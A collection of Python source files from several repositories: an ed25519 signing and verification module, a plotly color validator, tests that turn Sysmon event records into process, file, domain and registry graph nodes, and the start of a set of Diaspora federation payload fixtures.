838a572ac76a408a480d5ae9c29942808d7c1a4e | 15,297 | py | Python | securesystemslib/ed25519_keys.py | lukpueh/securesystemslib | 23fd8a23c8da38d337aaa6fff4d5110db5964e83 | [
"MIT"
] | null | null | null | securesystemslib/ed25519_keys.py | lukpueh/securesystemslib | 23fd8a23c8da38d337aaa6fff4d5110db5964e83 | [
"MIT"
] | 1 | 2019-09-03T10:15:08.000Z | 2019-10-01T11:04:52.000Z | securesystemslib/ed25519_keys.py | lukpueh/securesystemslib | 23fd8a23c8da38d337aaa6fff4d5110db5964e83 | [
"MIT"
] | null | null | null | """
<Program Name>
ed25519_keys.py
<Author>
Vladimir Diaz <vladimir.v.diaz@gmail.com>
<Started>
September 24, 2013.
<Copyright>
See LICENSE for licensing information.
<Purpose>
The goal of this module is to support ed25519 signatures. ed25519 is an
elliptic-curve public key signature scheme, its main strength being small
signatures (64 bytes) and small public keys (32 bytes).
http://ed25519.cr.yp.to/
'securesystemslib/ed25519_keys.py' calls 'ed25519.py', which is the pure Python
implementation of ed25519 optimized for a faster runtime. The Python
reference implementation is concise, but very slow (verifying signatures
takes ~9 seconds on an Intel core 2 duo @ 2.2 ghz x 2). The optimized
version can verify signatures in ~2 seconds.
http://ed25519.cr.yp.to/software.html
https://github.com/pyca/ed25519
Optionally, ed25519 cryptographic operations may be executed by PyNaCl, which
is a Python binding to the NaCl library and is faster than the pure python
implementation. Verifying signatures can take approximately 0.0009 seconds.
PyNaCl relies on the libsodium C library. PyNaCl is required for key and
signature generation. Verifying signatures may be done in pure Python.
https://github.com/pyca/pynacl
https://github.com/jedisct1/libsodium
http://nacl.cr.yp.to/
https://github.com/pyca/ed25519
The ed25519-related functions included here are generate(), create_signature()
and verify_signature(). The 'ed25519' and PyNaCl (i.e., 'nacl') modules used
by ed25519_keys.py perform the actual ed25519 computations and the functions
listed above can be viewed as an easy-to-use public interface.
"""
# Help with Python 3 compatibility, where the print statement is a function, an
# implicit relative import is invalid, and the '/' operator performs true
# division. Example: print 'hello world' raises a 'SyntaxError' exception.
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
# 'binascii' required for hexadecimal conversions. Signatures and
# public/private keys are hexlified.
import binascii
# TODO: The 'warnings' module needed to temporarily suppress user warnings
# raised by 'pynacl' (as of version 0.2.3). Warnings temporarily suppressed
# here to avoid confusing users with an unexpected error message that gives
# no indication of its source. These warnings are printed when using
# the repository tools, including for clients that request an update.
# http://docs.python.org/2/library/warnings.html#temporarily-suppressing-warnings
import warnings
# 'os' required to generate OS-specific randomness (os.urandom) suitable for
# cryptographic use.
# http://docs.python.org/2/library/os.html#miscellaneous-functions
import os
# Import the python implementation of the ed25519 algorithm provided by pyca,
# which is an optimized version of the one provided by ed25519's authors.
# Note: The pure Python version does not include protection against side-channel
# attacks. Verifying signatures can take approximately 2 seconds on an intel
# core 2 duo @ 2.2 ghz x 2). Optionally, the PyNaCl module may be used to
# speed up ed25519 cryptographic operations.
# http://ed25519.cr.yp.to/software.html
# https://github.com/pyca/ed25519
# https://github.com/pyca/pynacl
#
# Import the PyNaCl library, if available. It is recommended this library be
# used over the pure python implementation of ed25519, due to its speedier
# routines and side-channel protections available in the libsodium library.
#
# TODO: Version 0.2.3 of 'pynacl' prints: "UserWarning: reimporting '...' might
# overwrite older definitions." when importing 'nacl.signing'. Suppress user
# warnings temporarily (at least until this issue is fixed by PyNaCl).
#
# Note: A 'pragma: no cover' comment is intended for test 'coverage'. Lines
# or code blocks with this comment should not be flagged as uncovered.
# pynacl will always be install prior to running the unit tests.
with warnings.catch_warnings():
warnings.simplefilter('ignore')
try:
import nacl.signing
import nacl.encoding
# PyNaCl's 'cffi' dependency may raise an 'IOError' exception when importing
# 'nacl.signing'.
except (ImportError, IOError): # pragma: no cover
pass
# The optimized pure Python implementation of ed25519 provided by TUF. If
# PyNaCl cannot be imported and an attempt to use is made in this module, a
# 'securesystemslib.exceptions.UnsupportedLibraryError' exception is raised.
import securesystemslib._vendor.ed25519.ed25519
import securesystemslib.formats
import securesystemslib.exceptions
# Supported ed25519 signing schemes: 'ed25519'. The pure Python implementation
# (i.e., ed25519') and PyNaCl (i.e., 'nacl', libsodium + Python bindings)
# modules are currently supported in the creation of 'ed25519' signatures.
# Previously, a distinction was made between signatures made by the pure Python
# implementation and PyNaCl.
_SUPPORTED_ED25519_SIGNING_SCHEMES = ['ed25519']
def generate_public_and_private():
  """
  <Purpose>
    Create a fresh ed25519 keypair with PyNaCl.  Both the public key and the
    private (seed) key are 32-byte strings, conforming to
    'securesystemslib.formats.ED25519PUBLIC_SCHEMA' and
    'securesystemslib.formats.ED25519SEED_SCHEMA', respectively.

    >>> public, private = generate_public_and_private()
    >>> securesystemslib.formats.ED25519PUBLIC_SCHEMA.matches(public)
    True
    >>> securesystemslib.formats.ED25519SEED_SCHEMA.matches(private)
    True

  <Arguments>
    None.

  <Exceptions>
    securesystemslib.exceptions.UnsupportedLibraryError, if the PyNaCl
    ('nacl') module is unavailable.

    NotImplementedError, if no randomness source is found by 'os.urandom'.

  <Side Effects>
    Reads 32 bytes of OS randomness and derives the public key with
    nacl.signing.SigningKey().

  <Returns>
    A (public, seed) tuple of 32-byte strings.
  """

  # ed25519 seed keys are fixed at 32 bytes (256-bit keys).  os.urandom()
  # returns OS-specific randomness suitable for cryptographic use and raises
  # NotImplementedError if the platform provides no randomness source.
  seed = os.urandom(32)

  # PyNaCl performs the actual key generation.  If the 'nacl' import at module
  # scope failed, referencing it here raises NameError, which is converted to
  # the library's own exception type.
  try:
    signing_key = nacl.signing.SigningKey(seed)
    public = signing_key.verify_key.encode(encoder=nacl.encoding.RawEncoder())

  except NameError: # pragma: no cover
    message = 'The PyNaCl library and/or its dependencies unavailable.'
    raise securesystemslib.exceptions.UnsupportedLibraryError(message)

  return public, seed
def create_signature(public_key, private_key, data, scheme):
  """
  <Purpose>
    Produce an ed25519 signature over 'data' with PyNaCl and return it
    together with the scheme that generated it.  The signature is 64 raw
    bytes, conforming to
    'securesystemslib.formats.ED25519SIGNATURE_SCHEMA'.

    >>> public, private = generate_public_and_private()
    >>> data = b'The quick brown fox jumps over the lazy dog'
    >>> signature, scheme = create_signature(public, private, data, 'ed25519')
    >>> securesystemslib.formats.ED25519SIGNATURE_SCHEMA.matches(signature)
    True
    >>> scheme == 'ed25519'
    True

  <Arguments>
    public_key:
      The ed25519 public key, a 32-byte string.

    private_key:
      The ed25519 private (seed) key, a 32-byte string.

    data:
      The bytes to be signed.

    scheme:
      The signature scheme; only 'ed25519' is supported.

  <Exceptions>
    securesystemslib.exceptions.FormatError, if any argument is improperly
    formatted.

    securesystemslib.exceptions.CryptoError, if a signature cannot be
    created.

    securesystemslib.exceptions.UnsupportedLibraryError, if the PyNaCl
    library and/or its dependencies are unavailable.

  <Side Effects>
    nacl.signing.SigningKey.sign() is called to generate the signature.

  <Returns>
    A (signature, scheme) tuple, where 'signature' is a 64-byte string.
  """

  # Validate every argument before doing any cryptographic work; each
  # check_match() raises securesystemslib.exceptions.FormatError on mismatch.
  securesystemslib.formats.ED25519PUBLIC_SCHEMA.check_match(public_key)
  securesystemslib.formats.ED25519SEED_SCHEMA.check_match(private_key)
  securesystemslib.formats.ED25519_SIG_SCHEMA.check_match(scheme)

  # Defensive guard: check_match() above should already have rejected any
  # unsupported scheme.
  if scheme != 'ed25519': #pragma: no cover
    raise securesystemslib.exceptions.UnsupportedAlgorithmError(
        'Unsupported signature scheme is specified: ' + repr(scheme))

  # PyNaCl performs the actual signing; a missing 'nacl' module surfaces as
  # NameError and is translated to the library's own exception type.
  try:
    signing_key = nacl.signing.SigningKey(private_key)
    signed_message = signing_key.sign(data)

  except NameError: # pragma: no cover
    message = 'The PyNaCl library and/or its dependencies unavailable.'
    raise securesystemslib.exceptions.UnsupportedLibraryError(message)

  except (ValueError, TypeError, nacl.exceptions.CryptoError) as e:
    message = 'An "ed25519" signature could not be created with PyNaCl.'
    raise securesystemslib.exceptions.CryptoError(message + str(e))

  return signed_message.signature, scheme
def verify_signature(public_key, scheme, signature, data, use_pynacl=False):
  """
  <Purpose>
    Determine whether the private key corresponding to 'public_key' produced
    'signature' over 'data'.

    >>> public, private = generate_public_and_private()
    >>> data = b'The quick brown fox jumps over the lazy dog'
    >>> scheme = 'ed25519'
    >>> signature, scheme = \
        create_signature(public, private, data, scheme)
    >>> verify_signature(public, scheme, signature, data, use_pynacl=False)
    True
    >>> verify_signature(public, scheme, signature, data, use_pynacl=True)
    True

  <Arguments>
    public_key:
      The ed25519 public key, a 32-byte string.

    scheme:
      The 'ed25519' signature scheme used to produce 'signature'.

    signature:
      The signature to check, a 64-byte string.

    data:
      The bytes that were originally signed.

    use_pynacl:
      True to verify with PyNaCl (fast, side-channel hardened); False to use
      the pure Python implementation (slower).

  <Exceptions>
    securesystemslib.exceptions.UnsupportedAlgorithmError, if 'scheme' is not
    one of the supported signing schemes.

    securesystemslib.exceptions.FormatError, if any argument is improperly
    formatted.

    securesystemslib.exceptions.UnsupportedLibraryError, if 'use_pynacl' is
    True but PyNaCl is unavailable.

  <Side Effects>
    nacl.signing.VerifyKey.verify() or
    securesystemslib._vendor.ed25519.ed25519.checkvalid() performs the actual
    verification.

  <Returns>
    Boolean.  True if the signature is valid, False otherwise.
  """

  # Validate every argument; each check_match() raises
  # securesystemslib.exceptions.FormatError on mismatch.  ED25519PUBLIC_SCHEMA
  # also enforces the fixed 32-byte key length.
  securesystemslib.formats.ED25519PUBLIC_SCHEMA.check_match(public_key)
  securesystemslib.formats.ED25519_SIG_SCHEMA.check_match(scheme)
  securesystemslib.formats.ED25519SIGNATURE_SCHEMA.check_match(signature)
  securesystemslib.formats.BOOLEAN_SCHEMA.check_match(use_pynacl)

  valid_signature = False

  # Defensive check for a valid 'scheme'; check_match() above should already
  # have rejected unsupported values.
  if scheme in _SUPPORTED_ED25519_SIGNING_SCHEMES: #pragma: no cover
    if use_pynacl:
      try:
        nacl_verify_key = nacl.signing.VerifyKey(public_key)
        # verify() raises BadSignatureError on mismatch; its return value
        # (the verified message) is not needed here.
        nacl_verify_key.verify(data, signature)
        valid_signature = True

      except NameError: # pragma: no cover
        message = 'The PyNaCl library and/or its dependencies unavailable.'
        raise securesystemslib.exceptions.UnsupportedLibraryError(message)

      except nacl.exceptions.BadSignatureError:
        pass

    # Verify the 'ed25519' signature with the pure Python implementation.
    else:
      try:
        securesystemslib._vendor.ed25519.ed25519.checkvalid(signature,
            data, public_key)
        valid_signature = True

      # The pure Python implementation raises the generic 'Exception' for an
      # invalid signature, so a broad handler is deliberate here; failure is
      # reported through the False return value rather than re-raised.
      except Exception:
        pass

  else: #pragma: no cover
    message = 'Unsupported ed25519 signature scheme: ' + repr(scheme) + '.\n' + \
      'Supported schemes: ' + repr(_SUPPORTED_ED25519_SIGNING_SCHEMES) + '.'
    raise securesystemslib.exceptions.UnsupportedAlgorithmError(message)

  return valid_signature
if __name__ == '__main__':
  # Run the interactive sessions embedded in this module's docstrings as
  # doctests when the file is executed as a standalone script:
  #   $ python -B ed25519_keys.py
  import doctest
  doctest.testmod()
| 37.309756 | 81 | 0.740668 |
384fba6c855efd44c90b92f3144bc8d0d8cd022e | 126 | py | Python | redbrick/cli/__init__.py | dereklukacs/redbrick-sdk | 4cf93444c1d808694c1601334f9e039e616dfd3d | [
"MIT"
] | 1 | 2020-11-26T04:25:15.000Z | 2020-11-26T04:25:15.000Z | redbrick/cli/__init__.py | redbrick-ai/redbrick-sdk | 4cf93444c1d808694c1601334f9e039e616dfd3d | [
"MIT"
] | 33 | 2021-02-04T17:51:53.000Z | 2022-03-17T07:28:36.000Z | redbrick/cli/__init__.py | dereklukacs/redbrick-sdk | 4cf93444c1d808694c1601334f9e039e616dfd3d | [
"MIT"
] | 1 | 2021-06-09T10:06:35.000Z | 2021-06-09T10:06:35.000Z | """CLI for RedBrick SDK."""
from redbrick.cli.project import CLIProject
from redbrick.cli.public import cli_parser, cli_main
| 25.2 | 52 | 0.793651 |
4555646559c205362ffcd96596f3d05ea673323f | 506 | py | Python | plotly/validators/carpet/baxis/_minorgridcolor.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | 12 | 2020-04-18T18:10:22.000Z | 2021-12-06T10:11:15.000Z | plotly/validators/carpet/baxis/_minorgridcolor.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 27 | 2020-04-28T21:23:12.000Z | 2021-06-25T15:36:38.000Z | plotly/validators/carpet/baxis/_minorgridcolor.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 6 | 2020-04-18T23:07:08.000Z | 2021-11-18T07:53:06.000Z | import _plotly_utils.basevalidators
class MinorgridcolorValidator(_plotly_utils.basevalidators.ColorValidator):
    """Validator for the ``carpet.baxis.minorgridcolor`` property.

    Accepts any CSS color value; the actual validation is delegated to the
    generic ``ColorValidator`` base class.
    """

    def __init__(
        self, plotly_name='minorgridcolor', parent_name='carpet.baxis', **kwargs
    ):
        # Defaults mirror the plotly schema; callers may override the edit
        # trigger and the schema role through **kwargs.
        edit_type = kwargs.pop('edit_type', 'calc')
        role = kwargs.pop('role', 'style')
        super(MinorgridcolorValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            role=role,
            **kwargs
        )
59015888ca572743199b40c98765555c4c06248c | 11,855 | py | Python | tests/transformers/test_sysmon_transformer.py | limkokhian/beagle | 791e83db94e5a8ab1965b155bb79d32bb259d2b3 | [
"MIT"
] | 1,139 | 2019-03-24T09:09:05.000Z | 2022-03-27T14:54:38.000Z | tests/transformers/test_sysmon_transformer.py | limkokhian/beagle | 791e83db94e5a8ab1965b155bb79d32bb259d2b3 | [
"MIT"
] | 78 | 2019-03-24T16:56:06.000Z | 2022-02-27T21:31:38.000Z | tests/transformers/test_sysmon_transformer.py | limkokhian/beagle | 791e83db94e5a8ab1965b155bb79d32bb259d2b3 | [
"MIT"
] | 149 | 2019-03-24T16:44:45.000Z | 2022-03-11T12:20:51.000Z | import pytest
from beagle.nodes import File, Process, Domain, IPAddress, RegistryKey
from beagle.transformers.sysmon_transformer import SysmonTransformer
@pytest.fixture
def transformer() -> SysmonTransformer:
    """Provide a SysmonTransformer with no backing datasource."""
    instance = SysmonTransformer(None)
    return instance
def test_dns_event(transformer):
    """Sysmon EventID 22 (DNS query) yields process, image file and domain nodes."""
    event = {
        "Provider_Name": "Microsoft-Windows-Sysmon",
        "Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "Provider": None,
        "EventID_Qualifiers": "",
        "EventID": "22",
        "Version": "5",
        "Level": "4",
        "Task": "22",
        "Opcode": "0",
        "Keywords": "0x8000000000000000",
        "TimeCreated_SystemTime": "2019-08-03 14:31:49.660530",
        "TimeCreated": None,
        "EventRecordID": "295",
        "Correlation_ActivityID": "",
        "Correlation_RelatedActivityID": "",
        "Correlation": None,
        "Execution_ProcessID": "7176",
        "Execution_ThreadID": "4604",
        "Execution": None,
        "Channel": "Microsoft-Windows-Sysmon/Operational",
        "Computer": "DESKTOP-3KI19E0",
        "Security_UserID": "S-1-5-18",
        "Security": None,
        "EventData_RuleName": None,
        "EventData_UtcTime": 1564857108,
        "EventData_ProcessGuid": "{8eb9d026-9ad2-5d45-0000-0010b7760001}",
        "EventData_ProcessId": "4776",
        "EventData_QueryName": "share.microsoft.com",
        "EventData_QueryStatus": "0",
        "EventData_QueryResults": "type: 5 share.microsoft.com.edgekey.net;type: 5 e11095.dscd.akamaiedge.net;::ffff:23.32.80.227;",
        "EventData_Image": "C:\\Windows\\System32\\AppHostRegistrationVerifier.exe",
    }

    output = transformer.transform(event)
    assert len(output) == 3

    # Expected node order: querying process, its image file, queried domain.
    process, image_file, queried_domain = output

    assert queried_domain.domain == "share.microsoft.com"
    assert queried_domain in process.dns_query_for
    assert process in image_file.file_of
def test_process_creation(transformer):
    """Sysmon EventID 1 (process creation) links parent process to child."""
    event = {
        "Provider_Name": "Microsoft-Windows-Sysmon",
        "Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "Provider": None,
        "EventID_Qualifiers": "",
        "EventID": "1",
        "Version": "5",
        "Level": "4",
        "Task": "1",
        "Opcode": "0",
        "Keywords": "0x8000000000000000",
        "TimeCreated_SystemTime": "2019-08-03 14:24:22.586109",
        "TimeCreated": None,
        "EventRecordID": "3",
        "Correlation_ActivityID": "",
        "Correlation_RelatedActivityID": "",
        "Correlation": None,
        "Execution_ProcessID": "7176",
        "Execution_ThreadID": "4528",
        "Execution": None,
        "Channel": "Microsoft-Windows-Sysmon/Operational",
        "Computer": "DESKTOP-3KI19E0",
        "Security_UserID": "S-1-5-18",
        "Security": None,
        "EventData_RuleName": None,
        "EventData_UtcTime": 1564856662,
        "EventData_ProcessGuid": "{8eb9d026-9916-5d45-0000-001020f6b700}",
        "EventData_ProcessId": "7176",
        "EventData_Image": "C:\\Windows\\Sysmon64.exe",
        "EventData_FileVersion": "10.2",
        "EventData_Description": "System activity monitor",
        "EventData_Product": "Sysinternals Sysmon",
        "EventData_Company": "Sysinternals - www.sysinternals.com",
        "EventData_OriginalFileName": "?",
        "EventData_CommandLine": "C:\\Windows\\Sysmon64.exe",
        "EventData_CurrentDirectory": "C:\\Windows\\system32\\",
        "EventData_User": "NT AUTHORITY\\SYSTEM",
        "EventData_LogonGuid": "{8eb9d026-bb89-5ca7-0000-0020e7030000}",
        "EventData_LogonId": "0x00000000000003e7",
        "EventData_TerminalSessionId": "0",
        "EventData_IntegrityLevel": "System",
        "EventData_Hashes": "SHA1=751602F5D1F36C594196BEF744E32983F5291E49",
        "EventData_ParentProcessGuid": "{8eb9d026-bb89-5ca7-0000-001014a20000}",
        "EventData_ParentProcessId": "616",
        "EventData_ParentImage": "C:\\Windows\\System32\\services.exe",
        "EventData_ParentCommandLine": "C:\\Windows\\system32\\services.exe",
    }

    output = transformer.transform(event)
    assert len(output) == 4

    # Node order: parent process, parent image, child process, child image.
    parent_process = output[0]
    child_process = output[2]

    assert parent_process.launched[child_process]
def test_network_connection_no_hostname(transformer):
    """EventID 3 without a destination hostname yields only an IP node."""
    event = {
        "Provider_Name": "Microsoft-Windows-Sysmon",
        "Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "Provider": None,
        "EventID_Qualifiers": "",
        "EventID": "3",
        "Version": "5",
        "Level": "4",
        "Task": "3",
        "Opcode": "0",
        "Keywords": "0x8000000000000000",
        "TimeCreated_SystemTime": "2015-10-08 14:14:14.747887",
        "TimeCreated": None,
        "EventRecordID": "990",
        "Correlation_ActivityID": "",
        "Correlation_RelatedActivityID": "",
        "Correlation": None,
        "Execution_ProcessID": "4072",
        "Execution_ThreadID": "4620",
        "Execution": None,
        "Channel": "Microsoft-Windows-Sysmon/Operational",
        "Computer": "DESKTOP-OALUEJ1",
        "Security_UserID": "S-1-5-18",
        "Security": None,
        "EventData_UtcTime": 1444328053,
        "EventData_ProcessGuid": "{90e22fd2-8107-5615-0000-001090bd0100}",
        "EventData_ProcessId": "1704",
        "EventData_Image": "C:\\Windows\\System32\\svchost.exe",
        "EventData_User": "NT AUTHORITY\\SYSTEM",
        "EventData_Protocol": "tcp",
        "EventData_Initiated": "True",
        "EventData_SourceIsIpv6": "False",
        "EventData_SourceIp": "192.168.191.148",
        "EventData_SourceHostname": "DESKTOP-OALUEJ1.localdomain",
        "EventData_SourcePort": "1735",
        "EventData_SourcePortName": None,
        "EventData_DestinationIsIpv6": "False",
        "EventData_DestinationIp": "111.221.29.254",
        "EventData_DestinationHostname": None,
        "EventData_DestinationPort": "443",
        "EventData_DestinationPortName": "https",
    }

    output = transformer.transform(event)
    assert len(output) == 3

    # Node order: process, process image file, destination address.
    process, _image_file, destination = output

    assert process.connected_to[destination]
    assert destination.ip_address == "111.221.29.254"
def test_network_connection_with_hostname(transformer):
    """EventID 3 with a destination hostname also yields a resolving domain node."""
    event = {
        "Provider_Name": "Microsoft-Windows-Sysmon",
        "Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "Provider": None,
        "EventID_Qualifiers": "",
        "EventID": "3",
        "Version": "5",
        "Level": "4",
        "Task": "3",
        "Opcode": "0",
        "Keywords": "0x8000000000000000",
        "TimeCreated_SystemTime": "2015-10-08 14:14:14.747887",
        "TimeCreated": None,
        "EventRecordID": "990",
        "Correlation_ActivityID": "",
        "Correlation_RelatedActivityID": "",
        "Correlation": None,
        "Execution_ProcessID": "4072",
        "Execution_ThreadID": "4620",
        "Execution": None,
        "Channel": "Microsoft-Windows-Sysmon/Operational",
        "Computer": "DESKTOP-OALUEJ1",
        "Security_UserID": "S-1-5-18",
        "Security": None,
        "EventData_UtcTime": 1444328053,
        "EventData_ProcessGuid": "{90e22fd2-8107-5615-0000-001090bd0100}",
        "EventData_ProcessId": "1704",
        "EventData_Image": "C:\\Windows\\System32\\svchost.exe",
        "EventData_User": "NT AUTHORITY\\SYSTEM",
        "EventData_Protocol": "tcp",
        "EventData_Initiated": "True",
        "EventData_SourceIsIpv6": "False",
        "EventData_SourceIp": "192.168.191.148",
        "EventData_SourceHostname": "DESKTOP-OALUEJ1.localdomain",
        "EventData_SourcePort": "1735",
        "EventData_SourcePortName": None,
        "EventData_DestinationIsIpv6": "False",
        "EventData_DestinationIp": "111.221.29.254",
        "EventData_DestinationHostname": "google.com",
        "EventData_DestinationPort": "443",
        "EventData_DestinationPortName": "https",
    }

    output = transformer.transform(event)
    assert len(output) == 4

    # Node order: process, process image file, destination address, hostname.
    process = output[0]
    destination = output[2]
    hostname = output[3]

    assert destination in process.connected_to
    assert {"timestamp": 1444328053} in process.connected_to[destination]
    assert destination in hostname.resolves_to
    assert destination.ip_address == "111.221.29.254"
def test_filecreate_event(transformer):
    """Sysmon EventID 11 (file create) links the process to the written file."""
    event = {
        "Provider_Name": "Microsoft-Windows-Sysmon",
        "Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "Provider": None,
        "EventID_Qualifiers": "",
        "EventID": "11",
        "Version": "2",
        "Level": "4",
        "Task": "11",
        "Opcode": "0",
        "Keywords": "0x8000000000000000",
        "TimeCreated_SystemTime": "2017-09-24 20:54:55.222649",
        "TimeCreated": None,
        "EventRecordID": "16",
        "Correlation_ActivityID": "",
        "Correlation_RelatedActivityID": "",
        "Correlation": None,
        "Execution_ProcessID": "1812",
        "Execution_ThreadID": "4000",
        "Execution": None,
        "Channel": "Microsoft-Windows-Sysmon/Operational",
        "Computer": "DESKTOP-2C3IQHO",
        "Security_UserID": "S-1-5-18",
        "Security": None,
        "EventData_UtcTime": 1506300895,
        "EventData_ProcessGuid": "{0ad3e319-1b11-59c8-0000-0010054f3100}",
        "EventData_ProcessId": "3344",
        "EventData_Image": "C:\\Windows\\system32\\msiexec.exe",
        "EventData_TargetFilename": "C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe",
        "EventData_CreationUtcTime": "2017-09-24 20:54:55.023",
    }

    output = transformer.transform(event)
    assert len(output) == 3

    # Node order: process, process image file, created target file.
    process, _image_file, created_file = output

    assert process.accessed[created_file]
    assert created_file.file_name == "splunkd.exe"
@pytest.mark.parametrize(
    "event_type,edge_type",
    [
        ("SetValue", "changed_value"),
        ("DeleteValue", "deleted_value"),
        ("CreateKey", "created_key"),
        ("DeleteKey", "deleted_key"),
    ],
)
def test_registry(transformer, event_type, edge_type):
    """Each registry event type maps to the matching process->key edge."""
    event = {
        "Provider_Name": "Microsoft-Windows-Sysmon",
        "Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
        "Provider": None,
        "EventID_Qualifiers": "",
        "EventID": "13",
        "Version": "2",
        "Level": "4",
        "Task": "13",
        "Opcode": "0",
        "Keywords": "0x8000000000000000",
        "TimeCreated_SystemTime": "2017-09-24 20:54:56.862953",
        "TimeCreated": None,
        "EventRecordID": "56",
        "Correlation_ActivityID": "",
        "Correlation_RelatedActivityID": "",
        "Correlation": None,
        "Execution_ProcessID": "1812",
        "Execution_ThreadID": "4000",
        "Execution": None,
        "Channel": "Microsoft-Windows-Sysmon/Operational",
        "Computer": "DESKTOP-2C3IQHO",
        "Security_UserID": "S-1-5-18",
        "Security": None,
        "EventData_EventType": event_type,
        "EventData_UtcTime": 1506300896,
        "EventData_ProcessGuid": "{0ad3e319-0c16-59c8-0000-0010d47d0000}",
        "EventData_ProcessId": "532",
        "EventData_Image": "C:\\Windows\\system32\\services.exe",
        "EventData_TargetObject": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\splunkdrv\\Start",
        "EventData_Details": "DWORD (0x00000003)",
    }

    output = transformer.transform(event)
    assert len(output) == 3

    # Node order: process, process image file, registry key.
    process = output[0]
    target_key = output[2]
    edge = getattr(process, edge_type)

    assert target_key in edge

    # SetValue edges additionally carry the written value.
    expected = {"timestamp": 1506300896}
    if event_type == "SetValue":
        expected["value"] = "DWORD (0x00000003)"
    assert expected in edge[target_key]

    assert target_key.key == "Start"
| 36.702786 | 134 | 0.614677 |
005c863066fbf7b7841f3ce091c08c4f62225dd9 | 10,530 | py | Python | federation/tests/fixtures/payloads/diaspora.py | hoseinfzad/federation | a73c6d8fbd3cc13b48109467072763c4ca082116 | [
"BSD-3-Clause"
] | null | null | null | federation/tests/fixtures/payloads/diaspora.py | hoseinfzad/federation | a73c6d8fbd3cc13b48109467072763c4ca082116 | [
"BSD-3-Clause"
] | null | null | null | federation/tests/fixtures/payloads/diaspora.py | hoseinfzad/federation | a73c6d8fbd3cc13b48109467072763c4ca082116 | [
"BSD-3-Clause"
] | null | null | null | DIASPORA_PUBLIC_PAYLOAD = """<?xml version='1.0' encoding='UTF-8'?>
<me:env xmlns:me="http://salmon-protocol.org/ns/magic-env">
<me:encoding>base64url</me:encoding>
<me:alg>RSA-SHA256</me:alg>
<me:data type="application/xml">PHN0YXR1c19tZXNzYWdlPjxmb28-YmFyPC9mb28-PC9zdGF0dXNfbWVzc2FnZT4=</me:data>
<me:sig key_id="Zm9vYmFyQGV4YW1wbGUuY29t">Cmk08MR4Tp8r9eVybD1hORcR_8NLRVxAu0biOfJbkI1xLx1c480zJ720cpVyKaF9""" \
"""CxVjW3lvlvRz5YbswMv0izPzfHpXoWTXH-4UPrXaGYyJnrNvqEB2UWn4iHKJ2Rerto8sJY2b95qbXD6Nq75EoBNub5P7DYc16ENhp3""" \
"""8YwBRnrBEvNOewddpOpEBVobyNB7no_QR8c_xkXie-hUDFNwI0z7vax9HkaBFbvEmzFPMZAAdWyjxeGiWiqY0t2ZdZRCPTezy66X6Q0""" \
"""qc4I8kfT-Mt1ctjGmNMoJ4Lgu-PrO5hSRT4QBAVyxaog5w-B0PIPuC-mUW5SZLsnX3_ZuwJww==</me:sig>
</me:env>
"""
DIASPORA_RESHARE_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<me:env xmlns:me="http://salmon-protocol.org/ns/magic-env">
<me:data type="application/xml">PHN0YXR1c19tZXNzYWdlPgogIDxhdXRob3I-YXJ0c291bmQyQGRpYXNwLmV1PC9hdXRob3I-CiAgPGd1aWQ-NjI2NGNjNzAyOGM5MDEzNzQyODk0MDYxODYyYjhlN2I8L2d1aWQ-CiAgPGNyZWF0ZWRfYXQ-MjAxOS0wMy0xNFQyMDo1NToxMlo8L2NyZWF0ZWRfYXQ-CiAgPHB1YmxpYz50cnVlPC9wdWJsaWM-CiAgPHRleHQ-KipQbGVhc2Ugc3RheSBvZmYgdGhlIGdyYXNzIC4uLiBvcioqJiN4RDsKIVtdKGh0dHBzOi8vNjYubWVkaWEudHVtYmxyLmNvbS9kNGViMTMyMTZlZWY5ODE1ZjMzNTBhZDk1OTk5MmYxYy90dW1ibHJfcG80aXRjNzJKbjF5M3F1d25vMV81MDAuanBnKSYjeEQ7CiNzdGF5b2ZmPC90ZXh0Pgo8L3N0YXR1c19tZXNzYWdlPg==</me:data>
<me:encoding>base64url</me:encoding>
<me:alg>RSA-SHA256</me:alg>
<me:sig key_id="YXJ0c291bmQyQGRpYXNwLmV1">VWvuHE-HNgQGoCUqlNOEzl4qmrW3hl5qv4CwFu3-WXHeaB2ULGNDDbqO2sWE5R4TFjT-3WNLyma1QnL3dnozmnzdUT1DnL_Il2BwTTEUa3qHl1qaepikPWF_VKDTez-NJUzQCOFGENZcBSTfBy7yP0dErHhewaLXcXg37nCLyTN2elftE7x80BDXMZouApIMht2NvSwH91tIRw474Tuce2316JtVEdGhiGgzZ5iIF7BycUKw4Redxdc2RPvgJNWWqvgO6jYyc7rgzRtj1a_K7gA30Y280k6DkwNut8tCcUqU1FCN5AWT2S_vF8DIG3MWEBtqs7lDxDcjKBcQsXS9IY9sSwKr7kfT6wh6weHr2EbBv9ZPtbEL3_PY_orGLoz7MeJrO9bY2K59SptAs66esNJaqtQvlnbYXB8i6xLLWsTBc9t9WEx1EsBzLN5gak58evUoQVtVXQZ2kdR_rYR0U1dhVDWihL2fc_x7dkR2W8QTZKXPbdQwfday6msSOqQLWQ7NzJTh5djvkapY6Clu-ka_mMi7Avm0bzK5bEoGVUQidRM6Gq_e6hoPvq5J3-0SyAacQvP1sa9XEMHhvdumlnFPuwrcLHRb2utWlUS2L5BjXSlOt-k-HhSXFi5ClxFJL_-LqPeMOgCS07ogfeN_ZHfwNTMDdToVkBPi11sM0PY=</me:sig>
</me:env>
"""
DIASPORA_ENCRYPTED_PAYLOAD = """{
"aes_key": "...",
"encrypted_magic_envelope": "..."
}
"""
DIASPORA_POST_SIMPLE = """
<status_message>
<text>((status message))</text>
<guid>((guidguidguidguidguidguidguid))</guid>
